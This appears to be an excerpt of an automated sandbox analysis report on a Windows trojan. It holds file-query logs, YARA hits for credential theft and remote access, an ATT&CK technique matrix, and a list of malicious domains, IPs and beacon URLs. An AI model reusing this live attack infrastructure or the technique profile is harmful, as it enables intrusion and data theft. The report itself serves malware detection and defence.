          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Shared Modules | Path Interception | 512 Process Injection | 1 Rootkit | 1 Credential API Hooking | 121 Security Software Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 12 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 31 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 512 Process Injection | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 112 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 3 Software Packing | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
[Behavior graph. ID: 810265; Sample: SecuriteInfo.com.Win32.Malw...; Startdate: 16/02/2023; Architecture: WINDOWS; Score: 100. Process chain: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe (started) -> MSBuild.exe (started, three instances) -> explorer.exe (injected) -> cmmon32.exe (started) -> cmd.exe (started) -> conhost.exe (started).]

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe | 15% | ReversingLabs | Win32.Trojan.Generic |
SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe | 37% | Virustotal | | Browse
SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link | Download
3.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

No Antivirus matches

Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.hblcfl.com | 156.242.168.70 | true | true | | unknown
www.anbietertest.com | 45.195.140.44 | true | true | | unknown
www.couldskuathink.com | 160.121.126.44 | true | true | | unknown
www.desipizza.uk | 213.171.195.105 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
www.fliparcher.store/p25s/ | true | Avira URL Cloud: malware | low
http://www.desipizza.uk/p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4 | true | Avira URL Cloud: safe | unknown
http://www.couldskuathink.com/p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4 | true | Avira URL Cloud: safe | unknown
http://www.hblcfl.com/p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4 | true | Avira URL Cloud: safe | unknown
http://www.anbietertest.com/p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                              • Avira URL Cloud: malware
                              unknown
                              http://www.associazionefaber.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.iftar.rsvp/p25s/www.associazionefaber.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.sakkal.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.adamdavisgroup.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.associazionefaber.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.iqd964.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.32612.xyzReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.360740274.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568119582.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.339990008.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.hblcfl.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
